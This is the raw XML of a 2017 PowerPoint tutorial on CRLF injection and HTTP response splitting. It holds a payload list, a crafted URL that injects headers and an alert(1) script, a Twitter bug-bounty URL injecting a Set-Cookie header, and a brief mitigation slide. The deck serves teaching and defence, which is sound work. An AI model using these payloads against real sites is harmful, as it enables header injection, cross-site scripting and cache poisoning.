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58"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756FB4-2BCA-45DD-872F-BEF25B679095}"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220598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56FB4-2BCA-45DD-872F-BEF25B679095}"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74831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56FB4-2BCA-45DD-872F-BEF25B679095}"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61381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56FB4-2BCA-45DD-872F-BEF25B679095}"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387197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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">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924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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">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418850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756FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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34720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756FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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189238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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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288964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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">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134075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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">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6C0A6-A0F2-47FC-BED9-9861C6F950D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29170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56FB4-2BCA-45DD-872F-BEF25B679095}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/13/2017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6C0A6-A0F2-47FC-BED9-9861C6F950D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9131188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i/safety/report_story?next_view=report_story_start&amp;source=reporttweet&amp;reported_user_id=1&amp;reporter_user_id=1&amp;is_media=true&amp;is_promoted=true&amp;reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20tes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ithub.com/bhattsame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CRLF Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="3602038"/>
            <a:ext cx="12192000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CR and LF are control characters, respectively coded 0x0D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(%0D) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and 0x0A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(%0A)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They are used to mark a line break in a text file. As you indicated, Windows uses two characters the CR LF sequence; Unix only uses LF and the old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MacOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ( pre-OSX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MacIntosh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) used CR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216444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2" y="360609"/>
            <a:ext cx="10529552" cy="940158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRLF Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>attacks and HTTP Response Splitting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Carriage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Feed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966989" y="1709715"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CRLF injection, or HTTP response splitting, is a type of injection attack that can lead to Cross-site Scripting (XSS) and web cache poisoning among others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CRLF refers to the Carriage Return and Line Feed sequence of special characters. These two special characters represent the End of Line (EOL) marker for many internet protocols, including HTTP. Web applications typically split headers based on where the CRLF character sequence is found. Therefore, if a malicious user is able to inject their own CRLF sequence into an HTTP stream, they gain control over the contents of the HTTP response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Since CRLF characters can be used to split an HTTP response header, it is often also referred to as HTTP Response Splitting. The following example is a crafted request containing CRLF (the %0d%0a characters in the request below) that causes Cross-site Scripting.</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36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dirty="0" smtClean="0"/>
              <a:t>Payloads:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469265" y="1413501"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>嘊嘍 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>== %u560A%u560D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%0A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%0d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%0D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%E5%98%8A%E5%98%8DSet-Cookie:%20test </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some times: %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>s%n%s%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> also works.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3274269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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter CRLF $3,500</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15" y="2279561"/>
            <a:ext cx="10788876" cy="4134119"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772732" y="1275009"/>
            <a:ext cx="10753860" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" tooltip="https://twitter.com/i/safety/report_story?next_view=report_story_start&amp;source=reporttweet&amp;reported_user_id=1&amp;reporter_user_id=1&amp;is_media=true&amp;is_promoted=true&amp;reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test"/>
              </a:rPr>
              <a:t>https://twitter.com/i/safety/report_story?next_view=report_story_start&amp;source=reporttweet&amp;reported_user_id=1&amp;reporter_user_id=1&amp;is_media=true&amp;is_promoted=true&amp;reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290848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US" dirty="0" smtClean="0"/>
              <a:t>Twitter CRLF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1880316" y="2443015"/>
            <a:ext cx="883490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HTTP/1.1 200 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Content-Type: text/html;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charset=utf-8[CR][LF]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Set-Cookie: foo=[CR][LF]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[CR][LF]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&lt;img src="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Set-Cookie: twitter_sess=[...]; HTTPOnly[CR][LF]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[CR][LF]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&lt;p class="twttr"&gt;Original response body&lt;/p&gt;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FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://blog.innerht.ml/twitter-crlf-injection/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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3425779" y="1445221"/>
            <a:ext cx="5727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%E5%98%8A%E5%98%8DSet-Cookie:%20test </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2546599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352" y="1493949"/>
            <a:ext cx="10515600" cy="3631843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>http://www.yoursite.com/somepage.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%0d%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%0d%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%0d%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%0d%0a%0d%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%3Cscript%3Ealert(1)%3C/script%3E</a:t>
            </a:r>
          </a:p>
          <a:p>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The victim will see the following in their browser</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&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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71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352" y="1220318"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variations of this attack can be used to poison proxy or web caches in order to get the cache to serve the attacker’s content to other users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mitigating CRLF injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fortunately, CRLF attacks are usually mitigated by many web frameworks automatically, however, even if the vulnerability is not mitigated, it’s a very simple vulnerability to fix — simply strip out any input which contains the %0d%0a URL encoded characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1021875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203" y="2186233"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bhattsameer5@gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.github.com/bhattsameer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter-handler: @Sameer_bhatt5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="493915"/>
            <a:ext cx="10515600" cy="806852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For any query: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233018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449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Calibri Light</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CRLF Injection</vt:lpstr>
      <vt:lpstr> CRLF Injection attacks and HTTP Response Splitting Carriage  Line Return     Feed</vt:lpstr>
      <vt:lpstr>Payloads:</vt:lpstr>
      <vt:lpstr>Twitter CRLF $3,500</vt:lpstr>
      <vt:lpstr>Twitter CRLF</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>For any query: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CRLF Injection</dc:title>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>dell</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-11T07:49:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-13T07:15:38Z</dcterms:modified>
</cp:coreProperties>
</file>